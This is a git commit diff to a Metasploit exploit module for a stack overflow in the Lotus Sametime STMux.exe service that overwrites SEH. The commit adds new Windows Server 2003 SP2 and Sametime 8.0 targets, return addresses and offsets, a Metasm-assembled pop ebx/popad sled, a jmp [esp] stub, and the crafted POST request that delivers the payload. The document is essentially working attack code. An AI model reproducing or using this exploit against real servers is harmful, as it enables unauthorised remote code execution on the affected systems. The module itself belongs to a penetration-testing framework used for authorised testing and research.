Updated with changes from raif.

git-svn-id: file:///home/svn/framework3/trunk@6080 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/lotus/domino_sametime_stmux.rb

@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				STMux.exe service we are able to overwrite SEH. Based on the exploit
 				by Manuel Santamarina Suarez.
 			},
-			'Author'		=> 'patrick',
+			'Author'		=> [ 'patrick', 'riaf <riaf@mysec.org>' ],
 			'Arch'			=> [ ARCH_X86 ],
 			'License'		=> MSF_LICENSE,
 			'Version'		=> '$Revision$',
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Privileged'		=> true,
 			'DefaultOptions'	=>
 				{
-					'EXITFUNC' => 'process',
+					'EXITFUNC' => 'seh',
 				},
 			'Payload'		=>
 				{
@@ -51,10 +51,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Targets'  =>
 			[
 				# Patrick - Tested OK against Windows 2003 SP1 20081114
-				[ 'Lotus Sametime 7.5 on Windows Server 2000', { 'Ret' => 0x7c3410c2, 'Offset' => 268 } ], # pop ecx, pop exc, ret msvcr71.dll
+				[ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll
-				[ 'Lotus Sametime 7.5 on Windows Server 2003', { 'Ret' => 0x7c3410c2, 'Offset' => 269 } ], # pop ecx, pop exc, ret msvcr71.dll
+				[ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll
+                                [ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
+                                [ 'Lotus Sametime 7.5.1  Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }],
+                                [ 'Lotus Sametime 8.0.0  Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
 			],
-			'DisclosureDate' => 'Dec 27 2004', #
+			'DisclosureDate' => 'May 21 2008', 
 			'DefaultTarget' => 1))
 
 		register_options(
@@ -96,18 +99,22 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		connect
 
+		pad1 = rand_text_alpha_lower(44)
+                pad2 = rand_text_alpha_lower(29)
+
 		# Patrick - We should use Metasm here.
-     		#popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * 3
+     		popebx  = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0]
-		#popad	= Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset']
+		popad	= Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1]
-		
+                esp  = "\xff\x24\x24" # dword ptr ss:[esp]
-		popad = "\x5b" * 3 + "\x61" * target['Offset'] + "\xff\x24\x24" # pop ebx, popad jmp, dword ptr ss:[esp]
+		jmp  = "\x74\x23" + "\x75\x21" # je short, jnz short
-		jmp   = "\x74\x23" + "\x75\x21" # je short, jnz short
+                seh = [target['Ret']].pack('V')
-		path  = "\x66" * 44 + jmp + [target['Ret']].pack('V') + "\x66" * 29 + popad
+
+                path = pad1 + jmp + seh + pad2 + popebx + popad + esp
 
 		req = "POST /CommunityCBR/CC.39.#{path}/\r\n"
 		req << "User-Agent: Sametime Community Agent\r\n"
 		req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
-		req << "Content-Length: #{payload.encoded.length}\r\n"
+		req << "Content-Length: #{payload.encoded.length.to_s}\r\n"
 		req << "Connection: Close\r\n"
 		req << "Cache-Control: no-cache\r\n\r\n"
 		req << payload.encoded